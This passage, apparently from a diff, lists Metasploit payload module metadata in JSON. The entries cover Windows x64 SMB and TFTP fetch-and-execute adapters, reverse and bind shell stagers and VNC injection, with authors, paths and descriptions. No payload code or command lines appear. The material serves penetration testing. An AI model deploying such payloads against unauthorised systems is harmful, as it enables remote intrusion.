"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/shell_reverse_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/smb/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_named_pipe": { - "name": "SMB 
Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_tcp": { - "name": "SMB Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_tcp_rc4": { - "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/vncinject/bind_tcp_uuid": { - "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": 
"payload/cmd/windows/smb/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_http": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_https": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_tcp": { - "name": "SMB Fetch, Windows x64 Reverse TCP Stager", - "fullname": 
"payload/cmd/windows/smb/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_tcp_rc4": { - "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_tcp_uuid": { - "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_winhttp": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager 
(winhttp)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_winhttps": { - "name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 
15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": 
"payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/custom/bind_named_pipe": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_named_pipe", - "check": 
false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/custom/bind_tcp": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/custom/bind_tcp_rc4": { - "name": "TFTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch 
and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/custom/bind_tcp_uuid": { - "name": "TFTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - 
"stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_http": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_https": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_named_pipe": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_tcp": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 
Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_tcp_rc4": { - "name": "TFTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - 